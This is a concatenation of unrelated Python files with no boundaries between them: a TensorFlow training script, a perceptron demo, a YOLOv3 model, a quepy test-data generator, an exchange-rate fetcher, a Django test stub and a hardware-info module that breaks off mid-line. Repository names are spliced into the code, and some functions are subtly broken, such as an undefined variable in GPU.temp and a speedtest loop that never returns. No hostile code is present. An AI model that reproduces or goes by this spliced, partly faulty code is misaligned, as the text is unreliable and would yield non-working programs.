global_step = tf.Variable(0, trainable=False, name='global_step') increment_global_step = tf.assign_add( global_step, 1, name='increment_global_step') global_epoch = tf.Variable(0, trainable=False, name='global_epoch') increment_global_epoch = tf.assign_add( global_epoch, 1, name='increment_global_epoch') lrate = LearningRate(CONFIG['learning_rate'], CONFIG['lr_eta'], CONFIG['lr_delta'], CONFIG['lr_d'], global_epoch) # handle input/output directies # ----- # check directories TFRECORD_DIRECTORY, PARSER = helper.get_input_directory(CONFIG) WRITER_DIRECTORY, CHECKPOINT_DIRECTORY = \ helper.get_output_directory(CONFIG, FLAGS) # get image data # ----- # assign data_directories training_filenames, validation_filenames, test_filenames,\ evaluation_filenames = helper.get_image_files(TFRECORD_DIRECTORY, CONFIG['training_dir'], CONFIG['validation_dir'], CONFIG['test_dir'], CONFIG['evaluation_dir'], CONFIG['input_dir'], CONFIG['dataset'], CONFIG['n_occluders'], CONFIG['downsampling']) # parse data from tf-record files filenames = tf.placeholder(tf.string, shape=[None]) dataset = tf.data.TFRecordDataset(filenames) dataset = dataset.map(PARSER) if FLAGS.testrun: dataset = dataset.take(100) # take smaller dataset for testing dataset = dataset.shuffle(CONFIG['buffer_size']) # bad for evaluation? dataset = dataset.batch(CONFIG['batchsize'], drop_remainder=True) iterator = tf.data.make_initializable_iterator(dataset) next_batch = iterator.get_next() inp_left = next_batch[0] inp_right = next_batch[1] # preliminary support for grayscale within training if CONFIG['color'] == 'grayscale' and not('mnist' in CONFIG['dataset']): inp_left = tf.image.rgb_to_grayscale(inp_left) inp_right = tf.image.rgb_to_grayscale(inp_right) if not CONFIG['stereo']: inp_unknown = inp_left # define occlusion percentage if len(next_batch) > 4: occlusion_percentage = next_batch[-3] else: occlusion_percentage = tf.convert_to_tensor( np.repeat(CONFIG['occlusion_percentage'], CONFIG['batchsize'])) else: inp_unknown = tf.concat([inp_left, inp_right], axis=3) if len(next_batch) > 4: occlusion_percentage = (next_batch[-3] + next_batch[-4])/2 else: occlusion_percentage = tf.convert_to_tensor( np.repeat(CONFIG['occlusion_percentage'], CONFIG['batchsize'])) if CONFIG['label_type'] == "onehot": labels.variable = labels.variable.assign(next_batch[-1]) else: labels.variable = labels.variable.assign(next_batch[-2]) inp.variable = inp.variable.assign(inp_unknown) # initialize network classes # ----- # preprocessor # ----- # TODO: # This is a dynamic preprocessor. Maybe it would make sense to write a static # one and to write relevant files to disk to save computational ressources. inp_prep = preprocessor.PreprocessorNetwork("preprocessor", INP_MIN, INP_MAX, CONFIG['cropped'], CONFIG['augmented'], CONFIG['norm_by_stat'], CONFIG['image_height'], CONFIG['image_width'], CONFIG['image_channels'], CONFIG['batchsize'], is_training.placeholder) inp_prep.add_input(inp) # network # ----- network = circuit.constructor("rcnn", CONFIG, is_training.placeholder, keep_prob.placeholder, custom_net_parameters=None) one_time_error = bb.ErrorModule("cross_entropy", CONFIG['crossentropy_fn']) error = bb.TimeAddModule("add_error") optimizer = bb.OptimizerModule("adam", tf.train.AdamOptimizer(lrate.rate)) accuracy = bb.BatchAccuracyModule("accuracy") network.add_input(inp_prep) one_time_error.add_input(network) one_time_error.add_input(labels) error.add_input(one_time_error, 0) error.add_input(error, -1) # seems to work, but is this the right way..? 
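# Feeding the TimeAddModule its own output at offset -1 (above) makes it
# accumulate the per-timestep cross entropy, so the optimizer below appears to
# minimize the loss summed over all unrolled timesteps rather than only the
# final one.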
optimizer.add_input(error) accuracy.add_input(network) accuracy.add_input(labels) # L2 regularization term if CONFIG['l2_lambda'] != 0: lossL2 = bb.NontrainableVariableModule("lossL2", (), dtype=tf.float32) lossL2.variable = lossL2.variable.assign( tf.add_n( [tf.nn.l2_loss(v) for v in tf.trainable_variables()]) * CONFIG['l2_lambda'] / (CONFIG['time_depth'] + 1)) error.add_input(lossL2, 0) else: pass # create outputs, i.e. unfold the network error.create_output(CONFIG['time_depth'] + CONFIG['time_depth_beyond']) optimizer.create_output(CONFIG['time_depth']) for time in range(CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1): accuracy.create_output(time) if CONFIG['label_type'] == 'nhot': partial_accuracy = bb.NHotBatchAccuracyModule( "partial_accuracy", all_labels_true=False) accuracy = bb.NHotBatchAccuracyModule("accuracy", all_labels_true=True) accuracy.add_input(network) accuracy.add_input(labels) partial_accuracy.add_input(network) partial_accuracy.add_input(labels) for time in range(0, (CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1)): accuracy.create_output(time) partial_accuracy.create_output(time) # get information about which stimuli got classified correctly bool_classification = tf.reduce_all(tf.equal(tf.reduce_sum( tf.one_hot(tf.nn.top_k(network.outputs[CONFIG['time_depth']], k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices, depth=tf.shape(labels.variable)[-1]), axis=-2), labels.variable), axis=-1) bcx1 = tf.nn.top_k(network.outputs[CONFIG['time_depth']], k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices bcx2 = tf.nn.top_k(labels.variable, k=tf.count_nonzero( labels.variable[-1], dtype=tf.int32)).indices bool_classification = tf.stack([bcx1, bcx2]) else: bool_classification = tf.equal( tf.argmax(network.outputs[CONFIG['time_depth']], 1), tf.argmax(labels.variable, 1)) partial_accuracy = accuracy # average accuracy and error at mean test-time # ----- # embedding object for storing high dimensional representation embedding = EmbeddingObject(thumbnailsize=32, image_height=CONFIG['image_height'], image_width=CONFIG['image_width'], image_channels=CONFIG['image_channels'], batchsize=CONFIG['batchsize'], network_depth=CONFIG['network_depth'], network=network, accuracy=accuracy) # average test accuracy and error, defines partial_accuracy if not 'nhot' testaverages = TestAccuracy(accuracy, error, CONFIG['label_type'], partial_accuracy) # confusion matrix for tensorboard confusion_matrix = ConfusionMatrix(network, labels, CONFIG['classes'], CONFIG['time_depth']) # TODO: Update Confusion Matrix in the main loop, # otherwise it will not be updated # decide which parameters get written to tfevents # ----- # write operations: test_merged, train_merged, image_merged, add_merged = \ helper.get_and_merge_summaries(network, testaverages, error, accuracy, partial_accuracy, CONFIG['time_depth'], CONFIG['time_depth_beyond'], CONFIG['stereo']) # start session, merge summaries, start writers # ----- with tf.Session() as sess: train_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/training', sess.graph) test_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing') add_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing/extra') image_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/testing/images') if FLAGS.testrun: # debug writer for metadata etc. 
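        # Note: the FULL_TRACE run options and run metadata created just below
        # only record anything if they are also passed to sess.run(options=...,
        # run_metadata=...); here they are merely prepared for the test run.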
debug_writer = tf.summary.FileWriter( WRITER_DIRECTORY + '/debug', sess.graph) run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) run_metadata = tf.RunMetadata() saver = tf.train.Saver( keep_checkpoint_every_n_hours=1, max_to_keep=2, save_relative_paths=True) sess.run(tf.global_variables_initializer()) # training and testing functions # ----- def evaluating(train_it, flnames=evaluation_filenames, tag='Evaluation'): print(" " * 80 + "\r" + "[{}]\tstarted".format(tag), end="\r") sess.run([iterator.initializer, testaverages.reset, embedding.reset], feed_dict={filenames: flnames}) output_array = np.array([]) list_of_output_tensors = [] list_of_bc_values = [] list_of_occlusion_percentages = [] for time in range(CONFIG['time_depth']+1): list_of_output_tensors.append(tf.nn.softmax(network.outputs[time])) # delete bool_classification file if it already exists # if os.path.exists(CHECKPOINT_DIRECTORY + 'evaluation/' + # "bool_classification.txt"): # os.remove(WRITER_DIRECTORY + 'checkpoints/' + # 'evaluation/' + "bool_classification.txt") while True: try: _, _, extras, images, bc, occ, out = sess.run( [testaverages.update, embedding.update, add_merged, image_merged, bool_classification, occlusion_percentage, list_of_output_tensors], feed_dict={keep_prob.placeholder: 1.0, is_training.placeholder: False}) # save output and bool_classification data out = np.swapaxes(np.array(out), 0, 1) if len(output_array) == 0: output_array = out else: output_array = np.concatenate( [output_array, out], 0) list_of_occlusion_percentages += occ.tolist() if CONFIG['label_type'] == "onehot": list_of_bc_values += bc.astype(np.int8).tolist() else: for i in range(len(bc[0])): for el in bc[0][i]: list_of_bc_values += [int(el in set(bc[1][i]))] except (tf.errors.OutOfRangeError): break acc, loss, emb, emb_labels, emb_thu, summary = sess.run( [testaverages.average_partial_accuracy[CONFIG['time_depth']], testaverages.average_cross_entropy[CONFIG['time_depth']], embedding.total, embedding.labels, embedding.thumbnails, test_merged]) print(" " * 80 + "\r" + "[{}]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(tag, loss, acc, train_it)) # pass labels to write to metafile return emb, emb_labels, emb_thu, \ list_of_bc_values, list_of_occlusion_percentages, \ output_array def write_embeddings_to_disk(emb, emb_labels, emb_thu, list_of_bc_values): saver.save(sess, CHECKPOINT_DIRECTORY + 'evaluation/' + CONFIG['exp_name'] + CONFIG['connectivity'] + CONFIG['dataset'], global_step=global_step.eval()) # define custom labels for interesting stimuli lookat = np.zeros(emb_labels.shape, dtype=np.int32) # lookat[-50:] = 1 emb_labels = np.asarray(emb_labels, dtype=np.int32) # save labels to textfile to be read by tensorboard np.savetxt(CHECKPOINT_DIRECTORY + 'evaluation/' + "metadata.tsv", np.column_stack( [emb_labels, CONFIG['class_encoding'][emb_labels], lookat, list_of_bc_values]), header="labels\tnames\tlookat\tboolclass", fmt=["%s", "%s", "%s", "%s"], delimiter="\t", comments='') # save thumbnails to sprite image visualizer.save_sprite_image(CHECKPOINT_DIRECTORY + 'evaluation/' + 'embedding_spriteimage.png', emb_thu[:, :, :, :]) # configure metadata linking projector_config = projector.ProjectorConfig() embeddings_dict = {} for i in range(CONFIG['time_depth'] + CONFIG['time_depth_beyond'] + 1): embeddings_dict[i] = projector_config.embeddings.add() embeddings_dict[i].tensor_name = \ embedding.total[i].name embeddings_dict[i].metadata_path = os.path.join( CHECKPOINT_DIRECTORY + 'evaluation/', 'metadata.tsv') 
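            # One projector entry is added per unrolled timestep; they all point
            # at the same metadata.tsv written above and the sprite image set
            # just below, so only the embedding tensors themselves differ.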
embeddings_dict[i].sprite.image_path = CHECKPOINT_DIRECTORY + \ 'evaluation/' + \ 'embedding_spriteimage.png' embeddings_dict[i].sprite.single_image_dim.extend( [embedding.thu_height, embedding.thu_height]) tsne_writer = tf.summary.FileWriter( CHECKPOINT_DIRECTORY + 'evaluation/') projector.visualize_embeddings( tsne_writer, projector_config) pass def evaluate_data(projector_bool=False, flnames=evaluation_filenames): # checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIRECTORY) # if checkpoint and checkpoint.model_checkpoint_path: # saver.restore(sess, checkpoint.model_checkpoint_path) # TODO: Do we really need checkpoint restore? # TODO: maybe evaluation directory is not needed? helper.. # TODO: get the occlusion percentages here also emb, emb_labels, emb_thu, list_of_bc_values, \ list_of_occlusion_percentages, output_array = evaluating( global_step.eval(), flnames=flnames) embedding_data = {} evaluation_data = \ {'boolean_classification': np.array(list_of_bc_values), 'occlusion_percentage': np.array(list_of_occlusion_percentages), 'softmax_output': output_array} if projector_bool: write_embeddings_to_disk(emb, emb_labels, emb_thu, list_of_bc_values) embedding_data['embedding'] = emb embedding_data['labels'] = emb_labels embedding_data['thumbnails'] = emb_thu else: embedding_data = None # else: # print('[INFO] No checkpoint data found, exiting') # sys.exit() return evaluation_data, embedding_data def testing(train_it, flnames=validation_filenames, tag='Validation'): print(" " * 80 + "\r" + "[{}]\tstarted".format(tag), end="\r") sess.run(iterator.initializer, feed_dict={filenames: flnames}) sess.run([testaverages.reset, confusion_matrix.reset]) while True: try: _, _, extras, images = sess.run( [testaverages.update, confusion_matrix.update, add_merged, image_merged], feed_dict={keep_prob.placeholder: 1.0, is_training.placeholder: False}) except(tf.errors.OutOfRangeError): break acc, loss, summary = sess.run( [testaverages.average_accuracy[CONFIG['time_depth']], testaverages.average_cross_entropy[CONFIG['time_depth']], test_merged]) print(" " * 80 + "\r" + "[{}]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(tag, loss, acc, train_it)) if not(FLAGS.restore_ckpt): test_writer.add_summary(summary, train_it) if CONFIG['visualization']: add_writer.add_summary(extras, train_it) image_writer.add_summary(images, train_it) # pass additional confusion matrix to image_writer cm_figure = visualizer.cm_to_figure( confusion_matrix.total.eval(), CONFIG['class_encoding']) image_writer.add_summary( tfplot.figure.to_summary( cm_figure, tag="confusionmatrix"), train_it) # helper.print_misclassified_objects( # confusion_matrix.total.eval(), # CONFIG['class_encoding'], 5) FLAGS.restore_ckpt = False return 0 def training(train_it): sess.run(iterator.initializer, feed_dict={ filenames: training_filenames}) while True: try: summary, extras, loss, acc = sess.run( [train_merged, add_merged, optimizer.outputs[CONFIG['time_depth']], accuracy.outputs[CONFIG['time_depth']]], feed_dict={keep_prob.placeholder: CONFIG['keep_prob'], is_training.placeholder: True}) if (train_it % CONFIG['write_every'] == 0): train_writer.add_summary(summary, train_it) if CONFIG['verbose']: print(" " * 80 + "\r" + "[Training]\tloss: {:.5f}\tacc: {:.5f} \tstep: {}" .format(loss, acc, train_it), end="\r") train_it = increment_global_step.eval() except (tf.errors.OutOfRangeError): _ = increment_global_epoch.eval() if CONFIG['decaying_lrate']: _ = lrate.decay_by_epoch.eval() print(" " * 80 + "\r" + "[INFO] Learningrate updated to {:.5f}" 
.format(lrate.rate.eval())) break return train_it # continueing from restored checkpoint # ----- if FLAGS.restore_ckpt: checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIRECTORY) if checkpoint and checkpoint.model_checkpoint_path: saver.restore(sess, checkpoint.model_checkpoint_path) print('[INFO] Restored checkpoint successfully') # subtract epochs already done CONFIG['epochs'] -= global_epoch.eval() print('[INFO] Continue training from last checkpoint:' + ' {} epochs remaining' .format(CONFIG['epochs'])) # sys.exit() else: print('[INFO] No checkpoint found,' + 'starting experiment from scratch') FLAGS.restore_ckpt = False # sys.exit() # training loop # ----- # prepare input normalization on preprocessor if CONFIG['norm_by_stat']: inp_prep.gather_statistics(sess, iterator, training_filenames, filenames, is_training, show_image=True) train_it = global_step.eval() for i_train_epoch in range(CONFIG['epochs']): if i_train_epoch % CONFIG['test_every'] == 0: _ = testing(train_it) saver.save(sess, CHECKPOINT_DIRECTORY + CONFIG['exp_name'] + FLAGS.name + CONFIG['dataset'], global_step=train_it) train_it = training(train_it) # final test (ideally on an independent testset) # ----- testing(train_it, flnames=test_filenames, tag='Testing') saver.save(sess, CHECKPOINT_DIRECTORY + CONFIG['exp_name'] + FLAGS.name + CONFIG['dataset'], global_step=train_it) evaluation_data, embedding_data = \ evaluate_data(projector_bool=CONFIG['projector'], flnames=test_filenames[:2]) # reduced [:1] train_writer.close() test_writer.close() image_writer.close() add_writer.close() # evaluation and afterburner # ----- essence = afterburner.DataEssence() essence.distill(path=WRITER_DIRECTORY, evaluation_data=evaluation_data, embedding_data=None) # embedding_data (save space) essence.write_to_file(filename=CONFIG['output_dir'] + FLAGS.config_file.split('/')[-1].split('.')[0] + '{}'.format(FLAGS.name) + '.pkl') essence.plot_essentials(CONFIG['output_dir'].rsplit('/', 2)[0] + '/visualization/' + FLAGS.config_file.split('/')[-1].split('.')[0] + '{}'.format(FLAGS.name) + '.pdf') #通过感知机分类半月数据 import numpy as np import matplotlib.pyplot as plt def sgn(y): y[y > 0] = 1 y[y < 0] = -1 return y class Perceptron(object): '''单层感知机 ''' def __init__(self, shape): super(Perceptron, self).__init__() self.w = np.ones(shape) #weigth self.b = 1.5 #the bias self.activate_func = sgn def update(self,x,y,out,learning_rate): self.w += learning_rate * x.T * (y - out) def calclate(self, x): return self.activate_func(np.dot(self.w, x.T) + self.b) def loss_func(self, pre_y, gt_y): return (pre_y - gt_y) ** 2 def train(self, x, y, epochs, learning_rate): losses = [] for epoch in range(epochs): loss_tmp = [] for i in range(x.shape[0]): out = self.calclate(x[i]) loss_tmp.append(self.loss_func(out, y[i])) self.update(x[i], y[i], out, learning_rate) losses.append(sum(loss_tmp)/len(loss_tmp)) return losses def predict(self, x): out = self.calclate(x) return out def test(self, x,y): label = self.predict(x) gt_count = np.sum(label==y) wrong_count = np.sum(label!=y) return wrong_count/(wrong_count+gt_count),gt_count/(wrong_count+gt_count) def get_params(self): return {'weight':self.w, 'bias':self.b} def draw(self): axis = [i for i in range(1000)] out = [self.w * i + self.b for i in axis] plt.plot(axis, out) plt.show() def load_data(file): x = [] y = [] with open(file, 'r') as f: lines = f.readlines() for line in lines: line = line.strip().split(',') x_item = [float(line[0]), float(line[1])] y_item = float(line[2]) x.append(x_item) y.append(y_item) return 
np.array(x), np.array(y) def split_data(x, y): train_x, test_x = x[:int(x.shape[0]*0.7)], x[int(x.shape[0]*0.7):] train_y, test_y = y[:int(y.shape[0]*0.7)], y[int(y.shape[0]*0.7):] return train_x, train_y, test_x, test_y if __name__ == '__main__': #进行非线性数据的分类实验时,只需要将数据的间隔缩小保证二者重合即可 desc = 'nonlinear' file = './halfmoon.txt' x,y = load_data(file) train_x, train_y, test_x, test_y = split_data(x, y) neur = Perceptron((1,2)) losses = neur.train(train_x,train_y,100, 0.0001) err,acc = neur.test(test_x, test_y) print('rate of error:', err) print('rate of accuracy:', acc) #画损失曲线 axis = [i for i in range(len(losses))] plt.figure() plt.plot(axis, losses) plt.savefig('../imgs/%s_mse_loss.png' % desc) #plt.show() #画决策面 x_aixs = x[:,0] y_aixs = x[:,1] neg_x_axis = x_aixs[y==-1] neg_y_axis = y_aixs[y==-1] pos_x_axis = x_aixs[y==1] pos_y_axis = y_aixs[y==1] #感知机的参数 params = neur.get_params() w = params['weight'] b = params['bias'] k = -1 * w[0][0] / w[0][1] b = -1 * b / w[0][1] divid_x = [i for i in range(-15,25)] divid_y = [k * i + b for i in divid_x] plt.figure() plt.plot(divid_x, divid_y, c='r') plt.scatter(neg_x_axis,neg_y_axis,c="b",s=10) plt.scatter(pos_x_axis,pos_y_axis,c="g",s=10) plt.savefig('../imgs/%s_divide.png' % desc) #保存决策面import time import torch import numpy as np import torch.nn as nn import torch.nn.functional as F from collections import defaultdict from detect.eval.src.layers import MaxPool1s, EmptyLayer, DetectionLayer, NMSLayer from detect.eval.src.utils import parse_cfg class YOLOv3(nn.Module): """YOLO v3 model Args - cfgfile: (str) path to yolo v3 config file - reso: (int) original image resolution """ def __init__(self, cfgfile, reso): super(YOLOv3, self).__init__() self.blocks = parse_cfg(cfgfile) self.reso = reso self.module_list = self.build_model(self.blocks) def build_model(self, blocks): """ Args - blocks: (list) list of building blocks description Returns - module_list: (nn.ModuleList) module list of neural network """ module_list = nn.ModuleList() in_channels = 3 # start from RGB 3 channels out_channels_list = [] for idx, block in enumerate(blocks): module = nn.Sequential() # Convolutional layer if block['type'] == 'convolutional': activation = block['activation'] try: batch_normalize = int(block['batch_normalize']) bias = False except: batch_normalize = 0 bias = True out_channels = int(block['filters']) kernel_size = int(block['size']) padding = (kernel_size - 1) // 2 if block['pad'] else 0 stride = int(block['stride']) conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias) module.add_module("conv_{0}".format(idx), conv) if batch_normalize != 0: module.add_module("bn_{0}".format( idx), nn.BatchNorm2d(out_channels)) if activation == "leaky": # for yolo, it's either leaky ReLU or linear module.add_module("leaky_{0}".format( idx), nn.LeakyReLU(0.1, inplace=True)) # Max pooling layer elif block['type'] == 'maxpool': stride = int(block["stride"]) size = int(block["size"]) if stride != 1: maxpool = nn.MaxPool2d(size, stride) else: maxpool = MaxPool1s(size) module.add_module("maxpool_{}".format(idx), maxpool) # Up sample layer elif block['type'] == 'upsample': upsample = nn.Module() module.add_module("upsample_{}".format(idx), upsample) # Shortcut layer elif block['type'] == 'shortcut': shortcut = EmptyLayer() module.add_module("shortcut_{}".format(idx), shortcut) # Routing layer elif block['type'] == 'route': route = EmptyLayer() module.add_module('route_{}'.format(idx), route) block['layers'] = 
block['layers'].split(',') if len(block['layers']) == 1: start = int(block['layers'][0]) out_channels = out_channels_list[idx+start] elif len(block['layers']) == 2: start = int(block['layers'][0]) end = int(block['layers'][1]) out_channels = out_channels_list[idx + start] + out_channels_list[end] # Detection layer elif block['type'] == 'yolo': mask = block['mask'].split(',') mask = [int(x) for x in mask] anchors = block['anchors'].split(',') anchors = [int(a) for a in anchors] anchors = [(anchors[i], anchors[i+1]) for i in range(0, len(anchors), 2)] anchors = [anchors[i] for i in mask] num_classes = int(block['classes']) ignore_thresh = float(block['ignore_thresh']) detection = DetectionLayer( anchors, num_classes, self.reso, ignore_thresh) module.add_module('detection_{}'.format(idx), detection) module_list.append(module) in_channels = out_channels out_channels_list.append(out_channels) return module_list def forward(self, x, y_true=None): """ Args - x: (Tensor) input Tensor, with size[batch_size, C, H, W] Returns - detections: (Tensor) detection result with size [num_bboxes, [batch idx, x1, y1, x2, y2, p0, conf, label]] """ detections = torch.Tensor().cuda() # detection results outputs = dict() # output cache for route layer self.loss = defaultdict(float) for i, block in enumerate(self.blocks): # Convolutional, maxpooling layer if block['type'] == 'convolutional' or block['type'] == 'maxpool': x = self.module_list[i](x) outputs[i] = x elif block['type'] == 'upsample': x = F.interpolate(x, scale_factor=int(block['stride'])) outputs[i] = x # Shortcut layer elif block['type'] == 'shortcut': x = outputs[i-1] + outputs[i+int(block['from'])] outputs[i] = x # Routing layer, length = 1 or 2 elif block['type'] == 'route': layers = block['layers'] layers = [int(a) for a in layers] if len(layers) == 1: # layers = [-3]: output layer -3 x = outputs[i + (layers[0])] # layers = [-1, 61]: cat layer -1 and No.61 elif len(layers) == 2: layers[1] = layers[1] - i map1 = outputs[i + layers[0]] map2 = outputs[i + layers[1]] x = torch.cat((map1, map2), 1) # cat with depth outputs[i] = x elif block['type'] == 'yolo': x = self.module_list[i][0](x) detections = x if len(detections.size()) == 1 else torch.cat( (detections, x), 1) outputs[i] = outputs[i-1] # skip return detections def load_weights(self, path, cutoff=None): """ Load darknet weights from disk. YOLOv3 is fully convolutional, so only conv layers' weights will be loaded Darknet's weights data are organized as 1. (optinoal) bn_biases => bn_weights => bn_mean => bn_var 1. (optional) conv_bias 2. 
conv_weights Args - path: (str) path to .weights file - cutoff: (optinoal, int) cutting layer """ fp = open(path, 'rb') header = np.fromfile(fp, dtype=np.int32, count=4) weights = np.fromfile(fp, dtype=np.float32) fp.close() header = torch.from_numpy(header) ptr = 0 for i, module in enumerate(self.module_list): block = self.blocks[i] if cutoff is not None and i == cutoff: print("Stop before", block['type'], "block (No.%d)" % (i+1)) break if block['type'] == "convolutional": batch_normalize = int( block['batch_normalize']) if 'batch_normalize' in block else 0 conv = module[0] if batch_normalize > 0: bn = module[1] num_bn_biases = bn.bias.numel() bn_biases = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_biases = bn_biases.view_as(bn.bias.data) bn.bias.data.copy_(bn_biases) ptr += num_bn_biases bn_weights = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_weights = bn_weights.view_as(bn.weight.data) bn.weight.data.copy_(bn_weights) ptr += num_bn_biases bn_running_mean = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_running_mean = bn_running_mean.view_as(bn.running_mean) bn.running_mean.copy_(bn_running_mean) ptr += num_bn_biases bn_running_var = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_running_var = bn_running_var.view_as(bn.running_var) bn.running_var.copy_(bn_running_var) ptr += num_bn_biases else: num_biases = conv.bias.numel() conv_biases = torch.from_numpy(weights[ptr:ptr+num_biases]) conv_biases = conv_biases.view_as(conv.bias.data) conv.bias.data.copy_(conv_biases) ptr = ptr + num_biases num_weights = conv.weight.numel() conv_weights = torch.from_numpy(weights[ptr:ptr+num_weights]) conv_weights = conv_weights.view_as(conv.weight.data) conv.weight.data.copy_(conv_weights) ptr = ptr + num_weights # -*- coding: utf-8 -*- from __future__ import absolute_import, division, unicode_literals from builtins import chr from future.utils import python_2_unicode_compatible import random from quepy.expression import Expression def get_random_unichar(): # returns only encodable unicode chars while True: x = random.random() if 0.1 > x: c = random.choice(" ./\n") elif 0.50 > x: c = chr(random.randint(65, 122)) elif 0.85 > x: c = chr(random.randint(0, 127)) else: c = chr(random.randint(0, 65535)) try: c.encode("utf-8") return c except UnicodeEncodeError: pass def random_data(only_ascii=False): data = [] first = True while first or 1 / 20 < random.random(): first = False if only_ascii: c = chr(random.randint(33, 126)) data.append(c) else: c = get_random_unichar() data.append(c) return "".join(data) def random_relation(only_ascii=False): data = random_data(only_ascii) data = data.replace(" ", "") if random.random() > 0.05: return data @python_2_unicode_compatible class UnicodeableDummy(object): def __str__(self): return data return UnicodeableDummy() def random_expression(only_ascii=False): """ operations: new node, add data, decapitate, merge """ mean_size = 20 xs = [40, 30, 50, 20] xs = [x * (1 - random.random()) for x in xs] assert all(x != 0. for x in xs) new_node, add_data, decapitate, _ = [x / sum(xs) for x in xs] expressions = [Expression(), Expression(), Expression(), Expression()] while len(expressions) != 1: if (1 / mean_size) < random.random(): # Will start to merge more and will not create new nodes new_node = 0. 
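            # Once new_node is forced to 0 no further Expression objects are
            # created, so the pool can only shrink through merges and the
            # surrounding while-loop eventually terminates with a single
            # expression.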
# Choose action r = random.random() if r < new_node: # New expression expressions.append(Expression()) elif r < add_data + new_node: # Add data e = random.choice(expressions) e.add_data(random_relation(only_ascii), random_data(only_ascii)) elif r < decapitate + add_data + new_node: # Decapitate e = random.choice(expressions) e.decapitate(random_relation(only_ascii), reverse=(0.25 < random.random())) elif len(expressions) != 1: # Merge random.shuffle(expressions) e2 = expressions.pop() e1 = expressions[-1] e1 += e2 return expressions[0] import aiohttp async def get_rates(session: aiohttp.ClientSession, base: str): async with session.get( f"https://api.exchangeratesapi.io/latest?base={base}" ) as response: rates = (await response.json())['rates'] rates[base] = 1. return base, rates Rhithick02/FilesharingFilesharing/client_test.py import asyncio import networking async def client_thing(): await networking.port_scanner() if __name__ == '__main__': networking.my_NAME = 'client' asyncio.get_event_loop().create_task(client_thing()) asyncio.get_event_loop().create_task(networking.status_update()) asyncio.get_event_loop().run_forever() 0 import re from django.test import TestCase from board.models import Post, Board, Comment from accounts.models import Account class BoardAppTest(TestCase): fixtures = ['test.json'] @classmethod def setUpTestData(cls): super().setUpTestData() cls.default_board = Board.objects.get(id=1) cls.user = Account.objects.get(id=1) def login(self): user = Account.objects.get(id=1) self.client.login(username=user.username, password='') def remove_csrf(self, origin): csrf_regex = r']+csrfmiddlewaretoken[^>]+>' return re.sub(csrf_regex, '', origin) kethan1/Hardware-Info """ This is a module used to get hardware info """ import psutil import cpuinfo import math import platform import sys import sysconfig from datetime import datetime import speedtest class CPU: info = cpuinfo.get_cpu_info() @staticmethod def cpu_cores(hyperthreading = False): return psutil.cpu_count(logical = hyperthreading) @staticmethod def architecture(): return CPU.info['arch'] @staticmethod def name(): return CPU.info['brand_raw'] @staticmethod def percent(time=0.2): return psutil.cpu_percent(time) @staticmethod def temp(fahrenheit=False): if platform.system() == 'Linux': return psutil.sensors_temperatures(fahrenheit=fahrenheit)['coretemp'] elif platform.system() == 'Windows': import WinTmp return WinTmp.CPU_Temp() elif platform.system() == 'Darwin': import MacTmp return MacTmp.CPU_Temp() class GPU: @staticmethod def Get_Gpus(multiple=False): if platform.system() == 'Windows': import wmi computer = wmi.WMI() if multiple: return [gpu.name for gpu in computer.Win32_VideoController()] else: return computer.Win32_VideoController()[0] @staticmethod def temp(): if platform.system() == 'Linux': return psutil.sensors_temperatures(fahrenheit=fahrenheit) elif platform.system() == 'Windows': import WinTmp return WinTmp.GPU_Temp() elif platform.system() == 'Darwin': import MacTmp return MacTmp.GPU_Temp() class Ram: mem = psutil.virtual_memory() @staticmethod def total_mem(acc): return round(Ram.mem.total/1000000000, acc) @staticmethod def used_mem(acc): return round(Ram.mem.used/1000000000, acc) @staticmethod def free_mem(acc): return round(Ram.mem.available/1000000000, acc) @staticmethod def refresh(): Ram.mem = psutil.virtual_memory() class Disk: @staticmethod def list_disks(every = False): return [{'device': i[0], 'mountpoint': i[1], 'fstype': i[2], 'opts': i[3]} for each in psutil.disk_partitions(all=every) for i in 
list(each)] @staticmethod def get_size(bts, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit in ["", "K", "M", "G", "T", "P"]: if bts < factor: return f"{bts:.2f}{unit}{suffix}" bts /= factor @staticmethod def total_r_and_w(): disk_io = psutil.disk_io_counters() return {'read': Disk.get_size(disk_io.read_bytes), 'write': Disk.get_size(disk_io.write_bytes)} @staticmethod def space(every=False): partitions = psutil.disk_partitions(all=every) to_return = {} for partition in partitions: try: partition_usage = psutil.disk_usage(partition.mountpoint) except PermissionError: # this can be catched due to the disk that # isn't ready continue to_return[(partition.device, partition.mountpoint, partition.fstype)] = { 'total': Disk.get_size(partition_usage.total), 'used': Disk.get_size(partition_usage.used), 'free': Disk.get_size(partition_usage.free), 'usage_percentage': partition_usage.percent } return to_return class Network: @staticmethod def get_ip(): import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except Exception: IP = None finally: s.close() return IP @staticmethod def singlespeedtest(): s = speedtest.Speedtest() s.get_servers() s.get_best_server() s.download() s.upload() res = s.results.dict() return res["download"], res["upload"], res["ping"] @staticmethod def speedtest(): for i in range(3): d, u, p = Network.singlespeedtest() print('Test #{}\n'.format(i+1)) if i == 3: return {'Download': d, 'Upload': u, 'Ping': p} class PythonInfo: version = (str(sys.version_info[0])+'.'+str(sys.version_info[1])+'.'+str(sys.version_info[2])) interpreterlocation = sys.executable location = sys.exec_prefix copyrightinfo = sys.copyright pythoninfo = sys.version class System: @staticmethod def name(): return [platform.system(), platform.release()] @staticmethod def hardware(more = False): if platform.system() == 'Windows': import wmi computer = wmi.WMI() if 